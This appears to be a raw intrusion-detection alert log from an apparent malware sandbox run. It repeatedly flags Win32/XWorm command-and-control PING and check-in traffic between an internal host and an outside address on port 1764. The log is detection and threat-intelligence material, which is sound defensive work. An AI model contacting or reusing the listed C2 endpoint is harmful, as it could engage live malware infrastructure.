                                                                                        2024-10-13T19:10:40.969346+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:40.969346+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.111048+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.111048+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.250573+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.250573+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.359748+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.359748+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.494957+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.494957+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.837602+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.837602+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.980895+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:41.980895+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.134508+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.134508+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.250604+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.250604+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.299919+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:42.304368+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.369942+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.369942+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.491871+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.491871+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.609775+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.609775+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.739813+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.739813+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.874248+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.874248+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.984999+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:42.984999+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.109877+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.109877+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.220918+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.220918+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.328652+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.328652+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.438175+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.438175+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.558839+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.558839+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.672279+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.672279+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.781912+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.781912+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.938252+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:43.938252+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.047606+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.047606+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.156670+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.156670+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.266365+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.266365+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.375616+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.375616+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.484849+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.484849+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.603783+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.603783+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.719550+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.719550+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.845230+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.845230+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.964746+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:44.964746+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.086522+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.086522+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.203830+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.203830+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.313171+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.313171+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.440514+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.440514+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.563159+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.563159+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.672346+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.672346+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.799329+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.799329+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.907029+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:45.907029+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.028128+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.028128+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.141170+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.141170+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.250576+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.250576+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.359872+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.359872+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.469357+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.469357+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.594377+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.594377+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.727997+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.727997+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.844282+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.844282+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.956906+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:46.956906+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.062991+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.062991+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.172509+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.172509+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.281647+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.281647+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.391634+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.391634+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.500451+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.500451+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.610075+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.610075+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.734692+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.734692+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.844171+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.844171+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.953515+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:47.953515+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.072244+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.072244+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.188604+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.188604+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.375865+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.375865+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.476096+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:48.476096+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:48.538935+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.538935+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.802398+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.802398+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.926299+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:48.926299+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.094743+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.094743+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.240105+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.240105+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.313305+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.313305+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.434543+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.434543+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.773687+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.773687+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.891085+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:49.891085+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.000584+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.000584+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.130808+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.130808+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.250473+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.250473+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.362934+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.362934+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.469279+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.469279+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.578771+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.578771+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.692746+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.692746+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.822813+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.822813+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.942028+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:50.942028+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.082286+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.082286+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.263764+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.263764+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.562931+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.562931+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.730585+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.730585+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.855271+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.855271+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.971735+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:51.971735+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.086662+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.086662+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.231068+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.231068+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.344086+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.344086+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.478933+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
